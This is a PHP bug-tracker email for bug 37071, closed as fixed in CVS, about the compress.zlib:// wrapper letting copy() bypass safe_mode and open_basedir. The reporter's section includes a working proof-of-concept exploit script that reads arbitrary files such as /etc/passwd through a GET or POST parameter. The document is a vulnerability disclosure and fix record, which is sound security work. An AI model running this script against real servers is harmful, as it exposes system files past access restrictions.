ID:               37071
 Updated by:       [EMAIL PROTECTED]
 Reported By:      unsecretarygeneral at gmail dot com
-Status:           Open
+Status:           Closed
 Bug Type:         Safe Mode/open_basedir
 Operating System: all
 PHP Version:      4.4.2
 New Comment:

This bug has been fixed in CVS.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.
 
Thank you for the report, and for helping us make PHP better.

The bug isn't in zlib (the inner fopen_wrapper simply passes on the
options its given).  The problem is in copy() (which passes the wrong
options).

5.1 already had the correct flags, but not other branches, I've applied
a fix to everywhere else.


Previous Comments:
------------------------------------------------------------------------

[2006-04-14 17:08:50] unsecretarygeneral at gmail dot com

Now the man Mr Millar has poatched this , please evaluate and
incorprate the fix ! 

http://www.sir-millar.com/blog/?p=5

------------------------------------------------------------------------

[2006-04-13 13:28:11] unsecretarygeneral at gmail dot com

Description:
------------
The zlib fopen function boes not adhere to safe_mode , or open_base
directory , hence an attacker can use zlib to compress 'any' file to a
temp folder / world writable folder .. 

This should be critical , and is NOT fixed in the current CVS . 

Reproduce code:
---------------
Example code . : called like http://hostname/?file=/etc/passwd

<?php


$file=""; // File to Include... or use _GET _POST
$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp



echo "<PRE>\n";
if(empty($file))
{
        if(empty($_GET['file']))
        {
                if(empty($_POST['file']))
                {
                        die("\nSet varibles \$tymczas, \$file or use
for varible file POST, GET like ?file=/etc/passwd\n
<B><CENTER><FONTCOLOR=\"RED\">SecurityReason.Com
Exploit</FONT></CENTER></B>"
);
                }
                else
                {
                        $file=$_POST['file'];
                }
        }
        else
        {
                $file=$_GET['file'];
        }
}

$temp=tempnam($tymczas, "cx");

if(copy("compress.zlib://".$file, $temp))
{
        $zrodlo = fopen($temp, "r");
        $tekst = fread($zrodlo, filesize($temp));
        fclose($zrodlo);
        echo "<B>--- Start File
".htmlspecialchars($file)."-------------</B>\n".htmlspecialchars($tekst)."\n<B>---
End File".htmlspecialchars($file)." ---------------\n";
        unlink($temp);

        die("\n<FONT COLOR=\"RED\"><B>File".htmlspecialchars($file)."
has been already loaded. SecurityReason Team;]</B></FONT>");
}
else
{
        die("<FONT COLOR=\"RED\"><CENTER>Sorry...
File<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
access.</CENTER></FONT>");
}
?>


Expected result:
----------------
list of /etc/passwd

Actual result:
--------------
list of /etc/passwd


------------------------------------------------------------------------


-- 
Edit this bug report at http://bugs.php.net/?id=37071&edit=1

Reply via email to